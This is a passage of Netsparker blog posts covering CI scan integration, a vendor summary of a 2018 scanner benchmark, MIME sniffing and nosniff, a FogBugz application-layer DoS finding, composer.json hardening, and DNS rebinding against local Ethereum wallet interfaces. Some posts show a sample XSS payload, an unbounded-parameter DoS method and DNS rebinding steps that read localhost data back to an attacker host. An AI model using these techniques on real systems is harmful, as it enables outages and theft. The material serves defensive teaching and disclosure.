     In this command, the value 'Detailed Scan Report' given to the rt parameter is taken from the template names contained in the C:\Users\{USERNAME}\Documents\Netsparker\Resources\Report Templates directory.

     If any other template name from this screenshot is included in the command instead of 'Detailed Scan Report', a report will be generated according to that template instead.

    Read the Netsparker Desktop Command Line Interface and Arguments for more detailed information about the parameters that you can use when running Netsparker Desktop via command line.

     8. Click Save to save the project.

     This screenshot shows a Console Output window after the created task runs.

     This screenshot shows a Workspace that is created after the task runs.

    How to Integrate Netsparker Desktop with GoCD


    GoCD is continuous delivery software similar to Jenkins. GoCD enables you to build automation into your software development workflow, including testing, bug fixing, web security scanning and vulnerability fixing.

    This article explains how to integrate Netsparker web application security scanner with GoCD, in order to trigger scans automatically when developers make changes to your web applications.

    Why Integrate Netsparker Desktop with GoCD?

    In software development projects, Developers, Testers and Penetration Testers all have their role to play. When Developers make changes to web applications for example, these changes have a knock-on impact on other teams and tasks.

     If the changes made by Developers can be used to trigger automatic scans, this saves the time required to manually configure and run scans, examine results, then assign and fix vulnerabilities. Development teams can continue to work on the areas to which they have been assigned, without having to switch tasks. Those assigned to vulnerabilities can view scans as they are running. Often, scans can run while developers are otherwise occupied or away from work. No one has to wait for a scan to complete before moving on to another task or back to their previous development tasks.

    Integrating GoCD with Netsparker

    There are two steps in this procedure:

     1. Adding Netsparker's installation directory to the PATH environment variable of the operating system.
    2. Creating a Custom Command Task on GoCD.

    Adding Netsparker’s Installation Directory to the PATH Environment Variable

    You need to add Netsparker’s installation directory to your OS's PATH environment variable on every machine on which you use Netsparker Desktop.

    How to Add Netsparker's Installation Directory to the PATH Environment Variable
    1. From your PC's desktop, right-click This PC, then click Properties. The Properties window is displayed.

     2. Click Advanced System Settings. The System Properties dialog is displayed with the Advanced tab open.
     3. Click Environment Variables. The Environment Variables dialog is displayed.

     4. From the System variables panel, click Path, then Edit. The Edit environment variable dialog is displayed.

     5. Click New, then enter Netsparker's installation directory path (the default is 'C:\Program Files (x86)\Netsparker'), and click OK.
     6. Click OK to close all remaining dialogs.

    Creating a Custom Command Task on GoCD

     Once you have created a Custom Command Task on GoCD and completed the required fields, each run of the task automatically scans with Netsparker and saves the formatted report file, Detailed Scan Report.

    How to Create a Custom Command Task on GoCD
    1. Open GoCD.

     2. From the Pipelines window, click the round settings button next to the pipeline you want to edit. The Quick Edit window is displayed.

     3. Click the Stages tab, then click the relevant stage. The Stage window is displayed.

     4. Click the Jobs tab, then click the relevant job. The Job window is displayed.

     5. Click the Tasks tab, then click Custom Command. The Edit Custom Command task window is displayed.

     6. In the Command field, enter:

    netsparker.exe

     7. In the Arguments field, enter the following code:

    /a
    /url
    http://php.testsparker.com/
    /rt
    "Detailed Scan Report"
    /r
    "C:\Program Files (x86)\Go Agent\pipelines\report_phptestsparkercom.html"

     8. Click Save.

    Report Templates Directory

     The rt parameter in the command line, used in the instructions in How to Create a Custom Command Task on GoCD, is given the value 'Detailed Scan Report'.

    This value is taken from the template names contained in the Report Templates directory (C:\Users\{USERNAME}\Documents\Netsparker\Resources\Report Templates). You can substitute the name of any other report template, to generate a different report at the end of the scan.

    For further information about parameters, see Netsparker Desktop Command Line Interface and Arguments.

    2018 Web Vulnerability Scanners Comparison – Netsparker Confirmed a Market Leader


    The 2018 independent web application security scanners benchmark results have been published. How did Netsparker fare when compared to the other web vulnerability scanners?

    In short, Netsparker was:

    • The only scanner that identified all the vulnerabilities
     • One of only two scanners that reported zero false positives

     None of the other scanners in the comparison performed as well as Netsparker. Read on to find out how the tests were conducted and to see the results of each individual test.

     Table of Contents

     1. What is the Web Application Security Scanner (DAST) Benchmark?
         1. How Are Tests Performed?
         2. The Negative Impact of False Positives
         3. False Positives Make Scaling Up Web Security Impossible
         4. Evaluation Criteria
     2. The Benchmark Results – Global Results
         1. How Many Vulnerabilities Did the Scanners Detect?
         2. How Many False Positives Were Reported?
         3. Graph with Global Detection & False Positives Rates
     3. The Benchmark Results – Individual Tests Results
         1. OS Command Injection Detection
         2. Remote File Inclusion / SSRF
         3. Path Traversal
         4. SQL Injection
         5. Reflective Cross-site Scripting (XSS)
         6. Unvalidated Redirect
     4. Are Web Security Scanner Comparisons Useful & Realistic?
         1. Which is the Best Web Application Security Scanner?
         2. Can Netsparker Identify Security Flaws in Your Web Applications and APIs?
     5. Past Comparisons Between Automated Web Application Security Scanners

        What is the Web Application Security Scanner (DAST) Benchmark?

        It is a test that compares the features, coverage, vulnerability detection rate and accuracy of automated web application security scanners, also known as web vulnerability scanners or Dynamic Application Security Testing (DAST) solutions.

        Individual tests were conducted by the independent Information Security Researcher and Analyst, Shay Chen. Shay has been conducting benchmark tests and improving the platform since 2010. So far he has released six benchmarks (2010, 2011, 2012, 2013/2014, 2015, 2017/2018). His work is considered the de facto comparison standard by the application security industry.

        How Are Tests Performed?

        Shay Chen and his team built the Web Application Vulnerability Scanner Evaluation Project (WAVSEP), a testbed that they scan to see how every scanner performs. WAVSEP is an open source project and new tests are incorporated every year. You can download it from the WAVSEP GitHub repository.

        This year, Shay and his team went a step further. They have been installing and integrating DAST solutions in real-life enterprise SSDLC (Secure Software Development Lifecycle) processes to get a better understanding of how they can expand the WAVSEP testbed and test the scanners. They have implemented automated vulnerability scanners in financial, hi-tech and telecom organizations. As Shay himself explains:

        Some of these experiences led us to develop test cases aimed to inspect issues in proclaimed features that we noticed didn't work as expected in actual implementations, and some to the creation of comparison categories that are apparently crucial for real-world implementations.

        The Negative Impact of False Positives

        Shay and his team also talked about the importance of accurate scan results in the report, after their first-hand experience with scanners in real-life environments. Quoting from the official benchmark results:

        Weeding out a reasonable amount of false positives during a pentest is not ideal, but could be performed with relative ease. However, thousands upon thousands of false positives in enterprise SSDLC periodic scan scenarios can take their toll.

        False positives in scan results are a serious detriment to the web application security industry. So much so that large organizations with hundreds or even thousands of web applications limit their efforts to a handful of mission-critical websites and ignore the rest. I was quite shocked to learn this, though it is unsurprising given the many hacks and data leaks that happen every year.

        False Positives Make Scaling Up Web Security Impossible

        If a solution reports false positives, it is impossible – unless you have an army of people – to scale up your efforts and secure all your web applications. Even if you have the budget for such an undertaking, there is still the troublesome problem of human error.

        This is why we developed Netsparker's proprietary Proof-Based Scanning technology, which automatically verifies detected vulnerabilities, proving that they are real flaws and not false positives. The benefits of such technology are plentiful: since the scan results are accurate, you can easily scale up your efforts. In a real-life environment with thousands of web applications, you can triage and start fixing vulnerabilities within a matter of hours.

        Evaluation Criteria

        In the 2017/2018 benchmark, Shay and his team included several previously uncovered aspects of scanners, along with new tests for vulnerability classes that had not been covered before. These included OS Command Injection, and repurposed XSS-via-RFI tests that can also be used for Server Side Request Forgery (SSRF) evaluation.

        The Benchmark Results – Global Results

        How Many Vulnerabilities Did the Scanners Detect?

        This matrix lists what percentage of all vulnerabilities each web application security scanner identified. Missing data or scores are represented with 'N/A'.

        Test                              Netsparker  WebInspect  AppSpider  Acunetix  Burp Suite  AppScan
        OS Command Injection (New)        100         N/A         99.11      78.57     93.3        N/A
        Remote File Inclusion/SSRF (New)  100         100         82.67      64.22     74.67       N/A
        Path Traversal                    100         91.18       81.61      94.12     78.31       100
        SQL Injection                     100         98.46       95.39      100       97          100
        Reflective XSS                    100         100         100        100       97          100
        Unvalidated Redirect              100         95.51       100        100       76.67       36.67
        Average %                         100.0       97.0        93.1       89.5      86.2        84.2

        Clearly, Netsparker beats the competition in terms of vulnerability detection. It was the only scanner to identify all the security issues, followed by HP WebInspect at 97% and Rapid7 AppSpider at 93.1%.

        Note: Missing data or scores were the result of lack of support (in some cases even a lack of response) from some vendors. Only the tests for which scanners had a result were used to calculate the global average.

        How Many False Positives Were Reported?

        This matrix lists the percentage of false positives each web application security scanner reported.

        Test                                Netsparker  AppSpider  WebInspect  AppScan  Acunetix  Burp Suite
        OS Command Injection (New)          0           0          0           0        0         0
        Remote File Inclusion / SSRF (New)  0           0          0           0        0         16.67
        Path Traversal                      0           0          0           0        0         12.5
        SQL Injection                       0           0          0           0        0         0
        Reflective XSS                      0           0          0           0        0         0
        Unvalidated Redirect                0           0          11          11       11        0
        Total %                             0.0         0.0        1.8         1.8      1.8       4.9

        Netsparker and Rapid7 AppSpider were the only solutions that reported zero false positives, while Burp Suite was the one that reported the most false positives.

        Graph with Global Detection & False Positives Rates

        This graph is a visual representation of the global results, illustrating both the vulnerability detection and false positives rates side by side for each vendor.

        The Benchmark Results – Individual Tests Results

        OS Command Injection Detection

        The OS Command Injection vulnerability test is one of the new tests. Netsparker was the only scanner to detect all the vulnerability instances in the test.

        Remote File Inclusion / SSRF

        This was also one of the new tests included in the WAVSEP benchmark. Netsparker and WebInspect were the only two scanners that detected all the vulnerabilities in this test. AppSpider followed with 82.67%, and then Burp Suite with 74.67%, though Burp Suite also reported 16.67% false positives.

        Path Traversal

        This time Netsparker and AppScan led the field, both of which detected all the Path Traversal vulnerabilities. Acunetix WVS and HP WebInspect came third and fourth, followed by AppSpider. Burp Suite detected the least, at 78.31%, and also reported 12.5% false positives.

        SQL Injection

        This is one of the classic tests: the SQL injection vulnerability. In this test, Netsparker, Acunetix WVS and AppScan detected all the vulnerabilities. HP WebInspect followed with 98.46%. None of the scanners reported any false positives in this test.

        Reflective Cross-site Scripting (XSS)

        All scanners but Burp Suite detected all the cross-site scripting vulnerabilities.

        Unvalidated Redirect

        In the unvalidated redirect vulnerability tests, three of the scanners (WebInspect, Acunetix and AppScan) reported false positives. AppScan also performed very poorly, with a detection rate of only 36.67%. On the other hand, Netsparker, AppSpider and Acunetix detected all the vulnerabilities.

        Are Web Security Scanner Comparisons Useful & Realistic?

        As a rule of thumb, nothing beats a live environment test. In fact, at Netsparker we always encourage potential customers to test our web security solution by scanning a staging copy of their web applications, as explained in How to Evaluate Web Application Security Scanners.

        It's impossible to test all the scanners available on the market. So, these comparisons are incredibly useful because they highlight who the market leaders are – those scanners that can detect the most vulnerabilities and generate accurate results.

        Which is the Best Web Application Security Scanner?

        The best web vulnerability scanner is the one that detects the most vulnerabilities in your web applications, is easiest to use and can help you automate most of your work. Finding vulnerabilities in a web application is not just about the duration of the scan, but also how long it takes to set up the scan (pre-scan) and verify the results (post-scan). Therefore, when you evaluate solutions, you should ensure that automated vulnerability confirmation is part of the equation.

        Read Shay Chen’s full report: Evaluation of Web Application Vulnerability Scanners in Modern Pentest/SSDLC Usage Scenarios.

        Can Netsparker Identify Security Flaws in Your Web Applications and APIs?

        The best way to find out is to download a demo and launch a vulnerability scan. Netsparker is very easy to use and most of the pre-scan configuration is automated. All you need to do is specify the URL and credentials (to scan password protected websites), and launch the scan.

        Past Comparisons Between Automated Web Application Security Scanners

        See the previous results for the comparisons between the 2015 web application security scanners and 2013-2014 web application security scanners.

        Netsparker's Weekly Security Roundup 2018 – Week 04


        Every security researcher should develop their skills in reading and understanding RFCs. While they may not provide an exciting read, they can still help you decipher how certain protocols work and what obstacles developers might face while attempting to implement them.

        Here is one example of an RFC text.

        This text was taken from RFC 7231 and explains the cases in which the server should send a Content-Type header. For those not familiar with the vocabulary in these documents, they contain various key words for developers, to help them correctly implement the protocol's features. The keyword 'SHOULD' from the sample RFC has a very specific meaning. It is defined in RFC 2119, Key words for use in RFCs to Indicate Requirement Levels, as follows:

        This word, or the adjective 'RECOMMENDED', means that there may exist valid reasons in particular circumstances to ignore a particular item, but the full implications must be understood and carefully weighed before choosing a different course.

This means that developers don't necessarily have to implement functionality marked with the 'SHOULD' key word if they have a good reason not to.

        But what happens if the server doesn't send a proper Content-Type header? How do web browsers deal with this scenario?

        What is Mime Type Sniffing?

        In many cases, browsers don't need to consult the Content-Type header in order to understand what kind of content they are currently processing. If the content begins with an <html> tag, it will most likely be interpreted using the mime type (text/html) and be treated as an HTML file. Similarly, if a certain file doesn't have a proper mime type but is included via a script src attribute, browsers assume that its content-type was meant to be application/javascript.

This is also known as Mime Type Sniffing. However, this behaviour is not free from security implications. Think of an upload functionality, for example. Let's suppose that a user is allowed to upload text files. This doesn't seem dangerous at first. But if the server doesn't return a proper Content-Type, it's possible for a user to upload a file that contains HTML tags and JavaScript code. If you were to visit the page with a browser that attempts to find out which Content-Type was intended, it would probably recognize the HTML tags in the file and render the content as if the text/html Content-Type header was set.
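For example (a hypothetical payload, purely for illustration), a file uploaded as harmless 'text' might contain nothing more than the following line; a sniffing browser would render it as HTML and execute the script under the vulnerable site's origin:

<b>Just some notes</b><script>alert(document.domain)</script>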

        Missing Content-Type Header Vulnerability

However, it's possible to prevent a browser from correcting the mime type. The way to do this is to set a header called X-Content-Type-Options with its only allowed value, nosniff. You may have seen this header already, but probably didn't think it was of great importance. The truth is that X-Content-Type-Options is an important header in terms of security, especially since it allows Site Isolation to be used.
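As a minimal sketch of the server-side fix in PHP (the file path is a hypothetical example), the handler serving uploaded files would declare the intended type explicitly and forbid sniffing:

<?php
// Serve an uploaded file strictly as plain text and tell the browser
// not to second-guess the declared mime type.
header('Content-Type: text/plain');
header('X-Content-Type-Options: nosniff');
readfile('uploads/notes.txt'); // hypothetical example path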

What is Site Isolation?

Site Isolation is a new feature that was introduced with Google Chrome 63. Simply put, different origins now run in different processes, regardless of whether they are loaded in a different tab, the same tab, or even in an iframe.

But is this isolation even necessary if we already have the Same Origin Policy (SOP)? SOP continues to be the most important building block among client-side security features for managing resources of different origins. But what happens if there is a Universal XSS (uXSS) vulnerability – an XSS type that results from a vulnerability in the browser itself and allows an attacker to access the DOM of different origins, thereby bypassing the Same Origin Policy?

This is where Site Isolation comes into play. The content of HTML, JSON and XML files is kept in separate processes and won't be shared with other processes unless otherwise specified by CORS headers. So even if you were able to include a JSON file from a different origin, you couldn't read it, because Chrome decides whether or not to use a different process for any given file by looking at the Content-Type header. The following Content-Types may be opened in a new process:

        • text/html
        • text/xml
        • application/xml
        • application/rss+xml
        • application/json
        • text/json
        • text/x-json
        • text/plain

In addition to the correct Content-Type, you need to make sure to include the X-Content-Type-Options: nosniff header.

        What You Need to Know About Site Isolation

        Site Isolation is available, but turned off by default in Chrome 63 and above. If you want to enable it, you need to enter chrome://flags/#enable-site-per-process into your browser and enable Site Isolation. The changes will take effect as soon as you restart the browser.

Additionally, it's possible to enable Site Isolation for specific sites only. This is a little more complicated than the option mentioned above, since you need to pass an additional flag to the Chrome executable when you start it. The flag --isolate-origins=https://google.com,https://youtube.com, for example, enables the feature for google.com and youtube.com only.

Another caveat is that HTTP Range Requests don't run in a separate process, due to their Content-Type (multipart/byteranges). For sensitive files, you should disable HTTP Range Requests if you want your users to benefit from Site Isolation.

But this isn't the only current disadvantage. When Site Isolation is enabled for every website, you might notice a 10-20% increase in resource consumption, which is why it's recommended to protect only certain sites with this feature. Additionally, this technology is not free from bugs. If you print a website, the iframes displayed on the page will be empty, and in some cases clicks and page scrolling won't work as expected within iframes.

        Yet again, it seems like better security measures come at the cost of worse user experience. It's hard to say if Chrome will get rid of the bugs in iframes, and whether the performance hits can be mitigated. However, if you want to be extra careful and can live with the occasional bug, or if you have a powerful high-end PC that can deal with 10-20% higher resource consumption, Site Isolation is a great feature that's worth testing.

        How We Found & Exploited a Layer 7 DoS Attack on FogBugz


        Modern day Denial of Service (DoS) attacks cause much consternation in the web security industry because they are so inexpensive, easy... and devastating! While the cost of conducting such attacks decreases by the day, the damage caused to target systems escalates with each attack.

        Attacks that capture the attention of the mass media use an army of infected devices to generate a massive amount of network traffic in order to take down target systems. They are typically low complexity network attacks. The objective is to render the system unusable for legitimate users. However, not all application layer Denial of Service (DoS) attacks are the same. Though many often aim to generate a very large amount of network traffic, sometimes it is enough to make only a few requests to achieve the desired effect.

In this article, I explain how specific application behavior I encountered in FogBugz (a web-based project management tool) might easily be used to overload a system. The Netsparker web application security scanner reported this issue in the latest version of FogBugz in early July 2017.

What to Check to Determine Whether a DoS Vulnerability Exists

        The first indicator to check is HTTP status codes. This does not mean, though, that there is a problem every time we do not see '200 OK' (the standard response for successful HTTP requests). It will become clear how this is useful to us in the example in the next section.

The second indicator is response size. If database queries are not sufficiently constrained, the response size can get out of control when an unexpected situation occurs.

Timing is the third important indicator. If a request that you've already checked takes an unusually long time to return a response, then this is probably the right place to test for DoS.
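To illustrate, here is a minimal sketch using PHP's curl extension that records all three indicators for a single request; the URL and parameter name are hypothetical stand-ins for the endpoint under test:

<?php
// Send one POST request and record the three DoS indicators.
$ch = curl_init('https://example.com/timesheet');
curl_setopt_array($ch, [
    CURLOPT_POST           => true,
    CURLOPT_POSTFIELDS     => 'summaryLevel=20000', // hypothetical parameter name
    CURLOPT_RETURNTRANSFER => true,
]);
curl_exec($ch);

$status = curl_getinfo($ch, CURLINFO_HTTP_CODE);     // first indicator: status code
$size   = curl_getinfo($ch, CURLINFO_SIZE_DOWNLOAD); // second indicator: response size
$time   = curl_getinfo($ch, CURLINFO_TOTAL_TIME);    // third indicator: timing

printf("status: %d, size: %.0f bytes, time: %.2f s\n", $status, $size, $time);
curl_close($ch);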

How We Determined FogBugz was Vulnerable to DoS

As with most project management tools, FogBugz (now known by its new name, Manuscript) has functionality that allows users to create timesheets for tracking their working time. Users can examine activities on specific dates by filtering.

        Once the filters are selected, the application makes a POST request and fetches the relevant records from the database. Every single user input is carefully sanitized to protect against attacks such as SQL Injection and XSS. Initially, everything might seem to be normal, but there is a small detail that can easily be overlooked.

Let's take a closer look at the Summary Level parameter and what it actually does. The default value of this parameter is '1'. When we send the request with this value, column headers (Date, Person, Case and Total) are displayed.

By entering higher numbers, we can produce more detailed tables. For example, when I entered '3', the application added two further columns.

You may not yet have noticed the problem, but it will become clearer when we enter a higher number and look closer at how the column names change.

There are no limit checks, such as 1 < x < 10, on the entered value. Therefore, an effectively unbounded loop occurs when we use large numbers for the parameter. To test this, I entered 20,000, and all the browsers I tested this on crashed because the response size was too large.

The advanced tools that web browsers offer developers cater for many things, but they may not be enough at this point.

        Checking Response Size and HTTP Status Codes With Curl

When I encounter browser crashes caused by problems like this, my preferred solution is curl, a command-line utility that allows you to easily issue HTTP requests. You can simply send the request and view the response details.

In the screenshot, you can see the value of the Summary Level parameter I sent on the right hand side. The highlighted section (fifth row from the bottom) shows a value of 20,000. In this case, the response size grew to 274 megabytes.

So, per request, we are able to increase the response size from 94 KB to 274 MB. When we use values above 20,000, this very quickly results in a 504 Gateway Timeout.

        Conducting Timing Tests With Curl

Curl also provides other timing details, such as time_namelookup, time_connect and time_starttransfer, and it allows users to print them with formatted output templates.

The timing details showed the response time for the request with the default value (1) for the Summary Level parameter, then with the parameter set to 1000, and finally with it set to 100,000.

The tests revealed that I was able to increase the response time up to 600-fold per request. It is possible to do the same for the response length.

        Overlooking Input Checks Can Lead to DoS on the Application Layer

As we have demonstrated in the FogBugz example, if attackers can make the server generate a huge amount of data using a relatively small request, this can lead to a DoS. Using a simple script with multi-threading support, an attacker can amplify this effect and eventually make the server unresponsive for all legitimate users. In this case, the maximum response size the server could produce was 274 MB, created by a single small request. If the necessary checks on user input had been made, such as limiting the parameter to 1 < x < 10, we would not have been able to produce such a huge response.

In this case, checking for these items would have prevented the vulnerability that led to the DoS.
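As a minimal sketch of the missing check (the parameter name is a hypothetical stand-in), the server could validate the range before running any query:

<?php
// Reject Summary Level values outside the range the UI actually supports.
$summaryLevel = filter_input(INPUT_POST, 'summaryLevel', FILTER_VALIDATE_INT, [
    'options' => ['min_range' => 1, 'max_range' => 10],
]);

if ($summaryLevel === false || $summaryLevel === null) {
    http_response_code(400);
    exit('Invalid Summary Level.');
}
// ...only now build the timesheet table with $summaryLevel...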


        Netsparker's Weekly Security Roundup 2018 – Week 05


        Table of Content

        1. Why You Should Be Careful What You Put Into Your composer.json File
        2. Why You Need to Use a Package Manager
            1. Composer Package Manager Can Expose Sensitive Information
            2. The Principle of Least Privilege Limits Exploitation Opportunities
        3. It's all about SOP – How Anyone Can Steal Your Ethereum Cryptocurrency With DNS Rebinding
            1. What are DNS, TTL and SOP?
            2. The Problem With JSON-RPC and Local Web Servers

        Why You Should Be Careful What You Put Into Your composer.json File

What do Joomla!, Typo3, MediaWiki and Matomo (formerly known as Piwik) have in common? Aside from the fact that all of them are popular open source PHP projects with a large number of users, there is one similarity that you will only notice if you try to install the projects yourself, or if you look at their GitHub repositories.

Each of these four project repositories contains a composer.json file. What does this file do? If these popular applications include it in their projects, there is probably a very good reason to use it. So what exactly is composer.json?

        Why You Need to Use a Package Manager

        You might be familiar with package management tools from the Linux operating system (pacman, APT, YUM), Mac OS (Homebrew), Windows (Microsoft Store), Android (Google Play) or iOS (App Store). If you're a developer, the chances are that you've also heard of the Node Package Manager (npm) or pip for Python.

        If you have used any of these tools in the past (and remember the alternative – compiling and installing the programs and all of their dependencies manually), you'll realize why almost all modern programming languages and operating systems have either a native package management tool or one that was developed by their respective communities. PHP is no exception.

        Composer Package Manager Can Expose Sensitive Information

        The composer.json file is part of the Composer Package Manager (CPM) for the PHP programming language. The CPM enables you to update, install and manage the libraries on which your application depends. All you need is the composer.json file and the CPM in order to parse it.

Since JSON files are designed to be easy to read by both machines and humans, you can open the file with a text editor (or with a browser, if it was accidentally left in the webroot). Then you can see which components the application depends on, and whether each one is up to date.

        You can already see where this is going. The composer.json file might reveal sensitive information to an attacker, such as the exact names and versions of your dependencies. While it's almost inevitable that your application will be exploited if you use vulnerable, out-of-date software, the information in this file can also help hackers craft a targeted attack, especially if you use dependencies that aren't widely known or audited.

        This is not the only issue that may arise from using Composer. The hard truth is that many developers use Composer incorrectly. Let's look at one of the most common mistakes. This example is replicated from section 1 of PHP Composer security:

        # composer.json: insecure
        {
          "name": "my/awesome_project",
          "require": {
            "php": "~7.1.7",
            "ext-mysqli": "*",
            "symfony/validator": "^4.0",
            "guzzlehttp/guzzle": "^6.3",
            "phpunit/phpunit": "^6.5",
            "squizlabs/PHP_CodeSniffer": "^3.2"
          },
          "autoload": {
            "psr-4": {
              "AwesomeProject\\": "app/",
              "AwesomeProject\\Tests\\": "tests/"
            }
          }
        }

Did you notice the subtle mistake? Both phpunit and PHP_CodeSniffer are development tools that are not designed to be used in a production environment. In addition, the autoload functionality includes the tests folder. While this is a convenient feature to have during the development process, it can lead to various vulnerabilities in production.

        The Principle of Least Privilege Limits Exploitation Opportunities

The real problem here is that you broaden your attack surface if you include additional libraries that are only needed during development. It's a good idea to adhere to the Principle of Least Privilege (POLP), which states that users should have only the bare minimum of privileges they need in order to carry out their tasks.

        Let's say that you want to implement comment functionality for a blog. If you use an SQL database in order to save the comments, you only need to allow INSERT statements. Since users don't have the option to delete their comments, it doesn't make sense to allow DELETE statements as well. So, if there is an SQL injection vulnerability in the comment functionality, an attacker's exploitation options are severely restricted. Also, if the SQL user's access is restricted to the comment table only, the attacker can't add a new Admin user for example.
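As a hedged sketch of this idea (the database, table and account names are all hypothetical), the comment feature would connect with an account that has been granted INSERT on the comments table only:

<?php
// Hypothetical one-time setup, run as a privileged database user:
//   CREATE USER 'comments_app'@'localhost' IDENTIFIED BY 'secret';
//   GRANT INSERT ON blog.comments TO 'comments_app'@'localhost';
//
// The application then uses the restricted account, so even an SQL
// injection flaw in this feature cannot DELETE rows or touch other tables.
$pdo = new PDO('mysql:host=localhost;dbname=blog', 'comments_app', 'secret');

$author = 'alice';
$body   = 'Nice post!';
$stmt = $pdo->prepare('INSERT INTO comments (author, body) VALUES (?, ?)');
$stmt->execute([$author, $body]);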

        The Composer developers are aware of this problem and provide an easy solution. They allow you to specify which packages you only want to use during development. This is relatively easy to implement. The secure version of the above composer.json file would look like this example which is replicated from section 2 of PHP Composer security:

        # composer.json: autoload-dev section
        {
          "name": "my/awesome_project",
          "require": {
            "php": "~7.1.7",
            "ext-mysqli": "*",
            "symfony/validator": "^4.0",
            "guzzlehttp/guzzle": "^6.3"
          },
          "require-dev": {
            "phpunit/phpunit": "^6.5",
            "squizlabs/PHP_CodeSniffer": "^3.2"
  },
  "autoload": {
    "psr-4": {
      "AwesomeProject\\": "app/"
    }
  },
          "autoload-dev": {
            "psr-4": {
              "AwesomeProject\\Tests\\": "tests/"
            }
          }
        }

By installing dependencies with composer install --no-dev, we can make sure that we only load the libraries needed in production, not the development ones.

        To find out more about composer security best practices, see PHP Composer security.

        It's all about SOP – How Anyone Can Steal Your Ethereum Cryptocurrency With DNS Rebinding

The value of cryptocurrencies is fairly unpredictable, given that they are still a young phenomenon and so easy to invest in, even for inexperienced traders. It's common for the price of Bitcoin – probably the most widely known cryptocurrency – to increase by $500 within the course of a single hour. The problem is that you can lose an equal amount of money in about the same time.

        Nevertheless, it looks like cryptocurrencies are gaining popularity among traders, merchants and, of course, criminals. Since many of these coins are untraceable and their value increases rapidly, they are a prime target for hackers.

        Tavis Ormandy, a researcher from Google's Project Zero, painfully reminded the developers of the Transmission Torrent client that it's not a good idea to run insecure web applications on your local network. He abused an insufficiently protected JSON-RPC interface on a server running on localhost. We'll examine what JSON-RPC is later in the article. Even when these HTTP servers aren't directly accessible from outside of your home network, it's possible that websites access them through your browser.

        What are DNS, TTL and SOP?

        To read more on why it is a dangerous idea to run insecure web applications on localhost or on your private home network, including DNS Rebinding, see Vulnerable Web Applications on Developers' Computers Allow Hackers to Bypass Corporate Firewalls.

        In this article, however, let's briefly examine what DNS rebinding is and how it can be used by attackers.

        First, you have to understand Same Origin Policy (SOP). SOP makes sure that http://attacker.com can't read the responses from requests it makes to http://banking.com. SOP is one of the fundamental building blocks of the modern web. Without it, opening a website could expose your private messages on social media websites, your bank account balance or the content of your emails to risk.

        Along with factors such as the protocol you used to visit a page, as well as the port running the web application, SOP is closely tied to the host name of the website. The host name is what you type into a browser when you want to visit the site. In the above example, the attacker's host name is http://attacker.com. Since it doesn't match http://banking.com, the SOP prevents it from reading the responses of requests it issues to the banking website.

In order for its host name to be resolved to an IP address, a website needs a name server. DNS rebinding is a very technical matter, so for the sake of illustration, let's just say that the DNS protocol is less like a phone book (even though it's often described as one) and more like a database on a server: you can change the IP your host name points to however you like, and as often as you want (for example, if you move your website to a different server).

Since this doesn't happen very often on most websites, the DNS response contains the Time To Live (TTL). This is a numeric value (in seconds) that specifies how long a client should consider the IP address safe to use. A value of 300 means that the IP will probably not change for the next five minutes. Therefore clients, such as browsers, won't ask the name server for the IP for at least another five minutes, guaranteeing faster loading times as well as fewer requests for the DNS server to answer.

        Five minutes is short. But, imagine that there was a value of zero seconds. For almost every real world client, this would mean that with every new HTTP request you would have to send a new DNS request too. Also, apparently setting a TTL of zero has different meanings depending on the client. Generally, it would be an instruction not to cache this DNS record and ask for the IP with every new request. This may be acceptable behaviour for some applications, but browsers are optimized to deliver the fastest possible loading time. This is a selling point of most modern browsers.

One extreme example of how important loading times are to browser manufacturers is Microsoft Edge's Windows 10 popups ('Edge is faster than Chrome, switch now!'), which many users found annoying and spammy. In any case, what browsers usually do is ignore the TTL value if it is less than 60 seconds, which is more than enough time to load all of a website's resources without causing additional overhead with too many DNS requests.

        How Attackers Can Game the System to Exploit a Local Application

        Now that you know the basics about TTL, SOP and DNS, let's take a look at how an attacker can game the system in order to exploit a local application, and which problems he faces. Assume that he can somehow force you to visit his website. In our example, we use attacker.com, though a real attacker would choose a slightly less obvious name! When you visit attacker.com, your browser issues a DNS request to its nameserver, which returns the server's IP, 192.0.2.2. There is usually a good reason why you were prompted to click the link, for example an article about a topic you are interested in. However, the page actually contains JavaScript code that constantly queries http://attacker.com/index.html, and sends the result back to 192.0.2.2/log.

        That's a little bit weird, isn't it? After all, the attacker already knows the content of his own index.html file, so what does this achieve? Well, imagine that the attacker advised his DNS server to return 192.0.2.2 in the first request, but 127.0.0.1 (the IP address corresponding to your local machine) in all subsequent DNS requests. The attacker sets the TTL to a very small value (less than 60 seconds) and then waits. After 60 seconds, the browser's DNS cache expires and the script that queries http://attacker.com/index.html doesn't fetch the index.html file on 192.0.2.2 again, but rather the file on 127.0.0.1, your local machine.

        The reason why he doesn't directly issue a request to 127.0.0.1/index.html is that he couldn't read the response due to SOP. However, since there is a script running under the origin of attacker.com and 127.0.0.1 is now also reachable under the origin of http://attacker.com, the same origin policy doesn't have any effect, and the attacker can receive and read the response from your local machine.

        The Problem With JSON-RPC and Local Web Servers

        Well, I'm not a developer, why would I run a web server on my local machine?

If you think about it, this is an absolutely valid question. If you don't install a server like Apache on your local machine, you shouldn't be concerned about DNS rebinding at all, should you? Unfortunately, it's not that easy. A lot of developers include local HTTP servers in their applications to let a certain website communicate with your local machine. An example of this would be an 'Open Song' button on a website that allows you to download music to your computer. The website could then communicate with the music player application through a web server running on localhost, which would then play the song. It's also common to let local applications communicate with each other through such an HTTP interface.

        But of course there are more vulnerable applications that may use an HTTP interface. A researcher, who goes by the Twitter name Jazzy, took a look at the local HTTP server of certain Ethereum wallets. He found out that many of them run a JSON-RPC interface on port 8545. JSON-RPC is a protocol that allows clients to communicate with a server in order to send notifications or instruct them to execute certain actions. As the name suggests, it uses JSON encoded messages for communication.
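For illustration, a JSON-RPC 2.0 message to such an interface is just an HTTP POST with a JSON body like the following sketch (eth_accounts is one of the standard Ethereum JSON-RPC methods; exactly which methods a given wallet exposes may vary):

{"jsonrpc": "2.0", "method": "eth_accounts", "params": [], "id": 1}

A vulnerable wallet would answer with a JSON object whose result field lists the wallet's addresses.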

The problem for an attacker targeting Ethereum wallets is that even though he could issue requests to the JSON-RPC interface, he couldn't read the responses. This is where DNS rebinding comes into play. Jazzy wrote a simple DNS server in Python that he used for DNS rebinding. He then wrote some JavaScript code in order to exploit the vulnerable Ethereum clients. This is how he described the process:

        • The victim opens attacker.com
        • The DNS server responds with Jazzy's server IP
        • attacker.com creates a hidden iframe, pointing to a random subdomain (corresponding to Jazzy's server IP) and the port 8545
        • The JavaScript code waits for 60 seconds, and then issues an XHR request to randomsubdomain.attacker.com/test
        • Since the DNS cache expires after a minute, the browser sends another DNS request; this time randomsubdomain.attacker.com points to 127.0.0.1
